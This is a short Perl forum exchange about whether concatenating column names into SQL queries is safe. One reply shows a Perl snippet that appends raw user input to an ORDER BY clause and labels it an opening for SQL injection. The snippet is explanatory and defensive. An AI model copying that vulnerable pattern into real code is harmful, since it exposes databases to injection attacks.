in reply to Safety of concatenating query string

bradcathey:

If your program is the source of the column names, then there shouldn't be a concern. You typically have problems with SQL-injection issues when a third-party can put in bits of code that can mess up the database. For example, in your first case, your program is supplying the names, so you don't have to worry. But if it were more like:

my $sort_by = <>;
my $stmt = 'SELECT * FROM time_sheet WHERE user_id=? ORDER BY ' . $sor
+t_by;

[download]

Then you're opening the door for someone to hose your database.

...roboticus

When your only tool is a hammer, all problems look like your thumb.

Replies are listed 'Best First'.
Re^2: Safety of concatenating query string
by bradcathey (Prior) on Jun 24, 2011 at 19:16 UTC

    Thanks for the reassurance all. Good to know.

    —Brad
    "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
[reply]

In Section Seekers of Perl Wisdom